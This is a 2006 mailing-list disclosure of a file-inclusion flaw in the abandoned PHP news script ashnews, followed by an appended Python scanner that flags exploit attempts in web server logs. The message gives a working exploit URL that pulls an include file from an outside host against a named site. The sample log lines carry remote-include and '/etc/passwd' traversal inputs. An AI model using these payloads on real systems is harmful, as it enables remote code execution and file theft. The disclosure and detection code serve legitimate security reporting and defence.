Message-ID: <43DF3F47.8010700@f-box.org>
Date: Tue, 31 Jan 2006 10:43:19 +0000
From: DanB-FD <dan-fd@...ox.org>
To: Dan B UK <dan-fd@...ox.org>
Cc: zeus olimpusklan <zeus.olimpusklan@...il.com>,
	full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	admin@...e-h.org, org@...urity.nnov.ru
Subject: Re: ashnews Cross-Site Scripting Vulnerability


Hi,

Dan B UK wrote:

> Due to the nature of the issue I am not disclosing the detail of it 
> until the writer of the software has updated it; maybe you could have 
> waited??
>
> A vulnerability that allows privileges of the apache user within the 
> limitations of how much PHP has been locked down.


Since the author of the product has got back to me with the following, I 
think it is OK to disclose the issue now.

"That is a known error. Unfortunately I have completely abandoned 
ashnews. In fact, I have been neglecting taking it down completely which 
I am going to do right now. - Derek"

The issue is in the handling of $pathtoashnews: it is not validated 
before being used by the script, allowing remote or local file inclusion.

eg: 
http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc?
( The ? is required to make the remote server (f-box.org) ignore the 
string that is appended to the variable $pathtoashnews )
( The website that is in the example above has already been defaced! )

Cheers,
DanB UK.
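
Added example, not part of the original message and not ashnews code: since the author states the product is abandoned, a site operator may want to check web server logs for requests that set pathtoashnews from the query string. It assumes Apache common/combined log format; the sample log lines, addresses and hosts are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "pathtoashnews"  # variable named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*://|data:)', re.I)

# Constructed sample lines (documentation IP range, example.net host).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Jan/2006:10:01:02 +0000] "GET /news/ashnews.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [31/Jan/2006:10:02:11 +0000] "GET /news/ashnews.php?pathtoashnews=http://example.net/inc.inc? HTTP/1.0" 200 312',
    '192.0.2.45 - - [31/Jan/2006:10:02:40 +0000] "GET /news/ashnews.php?pathtoashnews=..%2F..%2Fetc%2Fpasswd%00 HTTP/1.0" 200 88',
    '192.0.2.46 - - [31/Jan/2006:10:03:05 +0000] "GET /news/ashnews.php?pathtoashnews=lib/ HTTP/1.0" 200 88',
]

def classify(value):
    """Label a client-supplied include path."""
    v = unquote(value)  # second decode pass catches double-encoded values
    if SCHEME_RE.match(v) or v.startswith("//"):
        return "remote-include"
    if "\x00" in v or ".." in v or v.startswith(("/", "\\")):
        return "local-include"
    # The script is meant to set this path itself, so any value
    # arriving from the client is worth a look.
    return "param-override"

def scan(lines):
    """Yield (line_no, label, decoded_value) for requests that set PARAM.

    Only the query string is visible in an access log; values sent in
    a POST body or cookie will not show up here.
    """
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == PARAM:  # PHP variable names are case-sensitive
                yield no, classify(value), value

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Any hit is a reason to inspect the host for modified or dropped files and to take the script offline.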

